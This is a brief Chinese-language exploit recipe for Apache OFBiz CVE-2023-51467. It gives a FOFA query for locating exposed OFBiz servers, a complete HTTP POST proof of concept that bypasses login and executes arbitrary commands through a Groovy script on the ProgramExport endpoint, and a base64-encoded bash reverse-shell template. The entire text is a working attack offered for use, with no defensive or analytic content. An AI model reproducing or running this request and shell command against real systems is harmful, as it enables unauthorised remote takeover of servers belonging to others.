Apache OFBiz 某接口存在远程代码执行漏洞（CVE-2023-51467）

### fofa:

cert=”Organizational Unit: Apache OFBiz” || (body=”www.ofbiz.org” && body=”/images/ofbiz_powered.gif”) || header=”Set-Cookie: OFBiz.Visitor” || banner=”Set-Cookie: OFBiz.Visitor”

### POC：

POST /webtools/control/ProgramExport?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: your-ip
Accept:*/*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5. (windows NT 100; Win64; x64)AppleWebKit/537.36 (KHTML,like Gecko) Chrome/Safari/537.36
Accept-Encoding: gzip,deflate,br
Accept-Language:en-US,en;g=0.9
Connection: close

groovyProgram=import+groovy.lang.GroovyShell%0D%0A%0D%0AGroovyShell+shell+%3D+new+GroovyShell%28%29%3B%0D%0Ashell.evaluate%28%27%22执行的命令%22.execute%28%29%27%29

反弹shell：

bash -c {echo,base64编码的反弹shell指令}|{base64,-d}|{bash,-i}

PS:特殊符号需要URL编码